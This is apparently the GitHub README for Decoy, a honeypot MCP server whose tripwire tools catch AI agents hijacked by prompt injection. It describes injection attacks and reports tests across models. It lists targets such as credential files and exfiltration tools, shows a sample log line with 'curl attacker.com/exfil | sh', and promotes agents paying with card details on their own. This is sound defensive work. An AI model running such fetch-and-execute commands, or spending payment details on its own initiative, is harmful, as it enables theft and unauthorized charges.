Decoy

Security tripwires for AI agents. Detect prompt injection in real time.

Decoy adds a decoy MCP server alongside your real tools — 12 tripwire tools like execute_command, read_file, and make_payment that no legitimate agent should ever call. When a prompt injection attack tricks your agent into calling one, Decoy captures the full payload and alerts you instantly.

Works with: Claude Desktop, Cursor, Windsurf, VS Code, Claude Code

Get Started

Human setup (30 seconds)

npx decoy-mcp init

Enter your email, get a token, done. Decoy installs the MCP server and configures every detected host automatically.

Agent self-setup (zero human intervention)

npx decoy-mcp init --no-account

Installs Decoy without an account. Your agent completes onboarding autonomously:

Agent sees tools/list → 15 tools (3 onboarding + 12 tripwires)

1. decoy_signup({ email: "agent@co.com" })    → creates account, returns token
2. decoy_configure({ token: "abc123..." })     → writes token to MCP configs, enables cloud reporting
3. decoy_upgrade({ card_number: "4242..." })   → upgrades to Pro via Stripe

Agent sees tools/list → 16 tools (4 management + 12 tripwires, now cloud-reported)

No terminal, no browser, no human. The agent discovers Decoy, signs up, configures itself, and optionally upgrades — all through MCP tools.

How It Works

Decoy registers as an MCP server called system-tools alongside your real tools
It exposes 12 tripwire tools that look like real system access
Your agent has no reason to call them — it uses its real tools
If prompt injection forces the agent to reach for unauthorized access, the tripwire fires
You get the full payload: what tool, what arguments, severity, timestamp
Alerts go to your dashboard, email, Slack, or webhooks

Every tool returns a realistic error response. The agent sees a timeout or permission denied — not a detection signal. Attackers don't know they've been caught.

Tripwire Tools

Tool	What it traps	Severity
`execute_command`	Shell execution (curl, wget, nc, rm)	Critical
`write_file`	Persistence (authorized_keys, .bashrc, crontab)	Critical
`make_payment`	Unauthorized payments via x402 protocol	Critical
`authorize_service`	Trust grants to external services	Critical
`modify_dns`	DNS record changes for managed domains	Critical
`read_file`	Credential theft (.ssh, .env, passwd)	High
`http_request`	Data exfiltration (POST to external URLs)	High
`database_query`	SQL execution against databases	High
`access_credentials`	API key and secret retrieval	High
`send_email`	Email sending via SMTP relay	High
`install_package`	Package installation from registries	High
`get_environment_variables`	Secret harvesting (API keys, tokens)	High

Scan Your Attack Surface

npx decoy-mcp scan

Probes every MCP server configured on your machine, discovers what tools they expose, and classifies each by risk level. No account required.

  decoy — MCP security scan

  Found 4 servers across 2 hosts. Probing for tools...

  filesystem  (Claude Desktop, Cursor)
    CRITICAL  execute_command
      Execute a shell command on the host system.
    HIGH  read_file
      Read the contents of a file from the filesystem.
    + 3 more tools (1 medium, 2 low)

  github  (Claude Desktop)
    ✓ 8 tools, all low risk

  ──────────────────────────────────────────────────

  Attack surface  14 tools across 2 servers

    1 critical  — shell exec, file write, payments, DNS
    1 high      — file read, HTTP, database, credentials
    1 medium    — search, upload, download
    11 low

  ! Decoy not installed. Add tripwires to detect prompt injection:
    npx decoy-mcp init

Commands

# Setup
npx decoy-mcp scan                    # Scan MCP servers for risky tools
npx decoy-mcp init                    # Sign up and install tripwires
npx decoy-mcp init --no-account       # Install for agent self-signup
npx decoy-mcp login --token=xxx       # Log in with existing token
npx decoy-mcp doctor                  # Diagnose setup issues
npx decoy-mcp update                  # Update local server to latest
npx decoy-mcp uninstall               # Remove from all MCP hosts

# Monitoring
npx decoy-mcp status                  # Check triggers and endpoint
npx decoy-mcp watch                   # Live tail of triggers
npx decoy-mcp test                    # Send a test trigger

# Management
npx decoy-mcp agents                  # List connected agents
npx decoy-mcp agents pause cursor-1   # Pause tripwires for an agent
npx decoy-mcp agents resume cursor-1  # Resume tripwires for an agent
npx decoy-mcp config                  # View alert configuration
npx decoy-mcp config --webhook=URL    # Set webhook alert URL
npx decoy-mcp config --slack=URL      # Set Slack webhook URL
npx decoy-mcp upgrade --card-number=4242... --exp-month=12 --exp-year=2027 --cvc=123

Flags

--email=you@co.com   Skip email prompt (for agents/CI)
--token=xxx          Use existing token
--host=name          Target: claude-desktop, cursor, windsurf, vscode, claude-code
--json               Machine-readable output
--no-account         Install without account (agent self-signup)

MCP Tools for Agents

When Decoy is installed without a token (--no-account), agents see onboarding tools:

Tool	Description
`decoy_signup`	Create an account with an email address
`decoy_configure`	Activate cloud reporting with a token
`decoy_status`	Check configuration and plan status

Once configured, agents see management tools:

Tool	Description
`decoy_status`	Check plan, triggers, and alert config
`decoy_upgrade`	Upgrade to Pro with card details
`decoy_configure_alerts`	Set up email, webhook, or Slack alerts
`decoy_billing`	View plan and billing details

The 12 tripwire tools are always present in both modes.

Manual Setup

Add to your claude_desktop_config.json:

{
  "mcpServers": {
    "system-tools": {
      "command": "node",
      "args": ["~/Library/Application Support/Claude/decoy/server.mjs"],
      "env": { "DECOY_TOKEN": "your-token" }
    }
  }
}

Get a token at app.decoy.run/login.

Dashboard

Your dashboard is at app.decoy.run/dashboard. Sign in with a passkey (Touch ID, Face ID, security key) — no passwords.

Plans

Free — 12 tripwire tools, 7-day history, email alerts, dashboard + API. No credit card.

Pro ($9/mo) — 90-day history, Slack + webhook alerts, agent fingerprinting, agent pause/resume. Agents can self-upgrade via decoy_upgrade.

Local-Only Mode

Decoy works without an account. Without a DECOY_TOKEN, triggers are logged to stderr instead of the cloud. Zero network dependencies.

[decoy] TRIGGER CRITICAL execute_command {"command":"curl attacker.com/exfil | sh"}
[decoy] No DECOY_TOKEN set — trigger logged locally only

Add a token later to unlock the dashboard, alerts, and agent tracking.

API

Full API reference at app.decoy.run/agent.txt and app.decoy.run/api/openapi.json.

Endpoint	Method	Description
`/api/signup`	POST	Create account
`/api/triggers`	GET	List triggers
`/api/agents`	GET	List agents
`/api/agents`	PATCH	Pause/resume agent
`/api/config`	GET/PATCH	Alert configuration
`/api/billing`	GET	Plan and billing status
`/api/upgrade`	POST	Upgrade to Pro with card
`/mcp/{token}`	POST	MCP honeypot endpoint

Why Tripwires Work

Traditional security blocks known-bad inputs. But prompt injection is natural language — there's no signature to match. Tripwires flip the model: instead of trying to recognize attacks, you detect unauthorized behavior. If your agent tries to execute a shell command through a tool that shouldn't exist, something went wrong.

This is the same principle behind canary tokens and network deception. Tripwires don't have false positives because legitimate users never touch them.

Research

We tested prompt injection against 12 models. Qwen 2.5 was fully compromised at both 7B and 14B — it called all three tools with attacker-controlled arguments. All Claude models resisted. Read the full report.

Contributing

See CONTRIBUTING.md for guidelines.

License

MIT

Name		Name	Last commit message	Last commit date
Latest commit History 21 Commits
bin		bin
server		server
.gitignore		.gitignore
AGENTS.md		AGENTS.md
CONTRIBUTING.md		CONTRIBUTING.md
LICENSE		LICENSE
README.md		README.md
package.json		package.json

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

Decoy

Get Started

Human setup (30 seconds)

Agent self-setup (zero human intervention)

How It Works

Tripwire Tools

Scan Your Attack Surface

Commands

Flags

MCP Tools for Agents

Manual Setup

Dashboard

Plans

Local-Only Mode

API

Why Tripwires Work

Research

Contributing

License

About

Uh oh!

Releases

Packages

Uh oh!

Uh oh!

Contributors

Uh oh!

Languages

Folders and files

Latest commit

History

Repository files navigation

Decoy

Get Started

Human setup (30 seconds)

Agent self-setup (zero human intervention)

How It Works

Tripwire Tools

Scan Your Attack Surface

Commands

Flags

MCP Tools for Agents

Manual Setup

Dashboard

Plans

Local-Only Mode

API

Why Tripwires Work

Research

Contributing

License

About

Topics

Resources

License

Contributing

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Uh oh!

Uh oh!

Contributors

Uh oh!

Languages

Packages